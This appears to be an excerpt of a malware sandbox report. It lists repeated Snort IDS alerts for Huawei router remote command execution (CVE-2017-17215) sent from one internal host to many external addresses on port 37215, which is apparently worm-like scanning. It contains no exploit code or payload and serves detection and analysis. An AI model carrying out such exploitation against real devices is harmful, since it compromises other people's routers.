          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54586 -> 186.82.113.50:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45856 -> 156.24.100.198:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45856 -> 156.24.100.198:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44678 -> 197.205.36.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44678 -> 197.205.36.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58778 -> 122.103.109.10:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58778 -> 122.103.109.10:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37682 -> 156.199.184.224:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37682 -> 156.199.184.224:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48534 -> 37.122.99.93:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48534 -> 37.122.99.93:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58000 -> 186.21.14.185:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58000 -> 186.21.14.185:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45822 -> 197.47.196.21:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45822 -> 197.47.196.21:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52136 -> 197.163.252.92:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52136 -> 197.163.252.92:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33022 -> 222.116.65.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33022 -> 222.116.65.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34672 -> 45.128.218.43:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34672 -> 45.128.218.43:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56410 -> 222.131.176.36:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56410 -> 222.131.176.36:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60012 -> 31.106.136.8:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60012 -> 31.106.136.8:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37926 -> 186.2.182.252:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37926 -> 186.2.182.252:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57280 -> 181.24.230.194:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57280 -> 181.24.230.194:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33010 -> 210.4.91.57:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33010 -> 210.4.91.57:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34410 -> 186.12.247.139:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34410 -> 186.12.247.139:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44794 -> 138.50.20.148:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44794 -> 138.50.20.148:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46678 -> 138.218.166.83:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46678 -> 138.218.166.83:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38976 -> 41.114.180.100:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38976 -> 41.114.180.100:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49058 -> 94.113.217.88:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49058 -> 94.113.217.88:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37296 -> 94.68.31.77:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37296 -> 94.68.31.77:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44050 -> 121.252.244.197:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44050 -> 121.252.244.197:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39130 -> 154.213.213.137:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39130 -> 154.213.213.137:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33962 -> 156.82.80.1:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33962 -> 156.82.80.1:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54908 -> 190.17.85.252:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54908 -> 190.17.85.252:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37112 -> 37.100.211.138:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37112 -> 37.100.211.138:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51246 -> 138.22.24.251:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51246 -> 138.22.24.251:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47600 -> 94.168.20.128:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47600 -> 94.168.20.128:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60540 -> 37.221.103.249:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60540 -> 37.221.103.249:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42060 -> 138.205.161.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42060 -> 138.205.161.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53194 -> 37.234.141.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53194 -> 37.234.141.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53362 -> 157.224.2.226:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53362 -> 157.224.2.226:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60608 -> 121.45.22.95:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60608 -> 121.45.22.95:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43158 -> 186.99.120.134:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43158 -> 186.99.120.134:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56038 -> 94.177.153.17:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56038 -> 94.177.153.17:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40198 -> 94.155.242.143:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40198 -> 94.155.242.143:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44338 -> 203.134.191.190:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44338 -> 203.134.191.190:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51854 -> 122.66.251.213:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51854 -> 122.66.251.213:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45698 -> 190.132.74.186:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45698 -> 190.132.74.186:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48288 -> 156.66.39.234:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48288 -> 156.66.39.234:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56638 -> 197.200.20.4:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56638 -> 197.200.20.4:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45372 -> 157.237.179.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45372 -> 157.237.179.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47954 -> 138.76.155.246:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47954 -> 138.76.155.246:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56722 -> 41.52.90.174:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56722 -> 41.52.90.174:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36592 -> 197.175.62.183:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36592 -> 197.175.62.183:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46578 -> 102.174.236.48:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46578 -> 102.174.236.48:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46414 -> 190.25.242.73:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46414 -> 190.25.242.73:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38366 -> 197.103.49.32:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38366 -> 197.103.49.32:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40802 -> 102.154.185.26:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40802 -> 102.154.185.26:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41986 -> 41.226.230.209:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41986 -> 41.226.230.209:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46956 -> 45.226.49.103:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46956 -> 45.226.49.103:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35184 -> 94.192.136.30:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35184 -> 94.192.136.30:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39164 -> 156.246.100.143:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39164 -> 156.246.100.143:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60766 -> 94.218.120.117:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60766 -> 94.218.120.117:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53158 -> 192.0.112.188:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53158 -> 192.0.112.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40014 -> 190.23.31.39:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40014 -> 190.23.31.39:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60532 -> 138.42.206.167:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60532 -> 138.42.206.167:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49144 -> 45.196.12.202:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49144 -> 45.196.12.202:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46108 -> 94.33.68.232:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46108 -> 94.33.68.232:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48168 -> 197.77.131.165:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48168 -> 197.77.131.165:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44346 -> 197.112.218.186:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44346 -> 197.112.218.186:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37960 -> 45.89.189.96:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37960 -> 45.89.189.96:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36424 -> 122.53.129.25:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36424 -> 122.53.129.25:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57632 -> 186.172.167.207:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57632 -> 186.172.167.207:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40410 -> 138.26.202.207:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40410 -> 138.26.202.207:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49298 -> 161.206.137.143:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49298 -> 161.206.137.143:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42094 -> 222.32.90.31:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42094 -> 222.32.90.31:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50782 -> 190.161.193.84:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50782 -> 190.161.193.84:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36230 -> 157.17.156.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36230 -> 157.17.156.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51348 -> 102.179.122.2:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51348 -> 102.179.122.2:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39578 -> 94.166.37.38:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39578 -> 94.166.37.38:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56434 -> 190.144.145.46:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56434 -> 190.144.145.46:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39898 -> 45.117.236.238:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39898 -> 45.117.236.238:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55352 -> 181.70.60.142:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55352 -> 181.70.60.142:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51638 -> 45.46.150.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51638 -> 45.46.150.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45566 -> 31.255.153.9:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45566 -> 31.255.153.9:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56562 -> 37.111.158.133:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56562 -> 37.111.158.133:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57304 -> 122.98.3.28:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57304 -> 122.98.3.28:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56332 -> 180.113.68.206:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56332 -> 180.113.68.206:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40506 -> 138.148.33.93:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40506 -> 138.148.33.93:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52114 -> 37.165.244.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52114 -> 37.165.244.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47920 -> 31.206.48.28:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47920 -> 31.206.48.28:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34108 -> 181.66.91.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34108 -> 181.66.91.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56060 -> 190.30.148.127:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56060 -> 190.30.148.127:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54854 -> 197.142.0.23:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54854 -> 197.142.0.23:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44948 -> 223.189.102.228:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44948 -> 223.189.102.228:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41536 -> 222.110.30.160:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41536 -> 222.110.30.160:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45696 -> 190.26.170.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45696 -> 190.26.170.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56744 -> 37.170.107.31:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56744 -> 37.170.107.31:37215
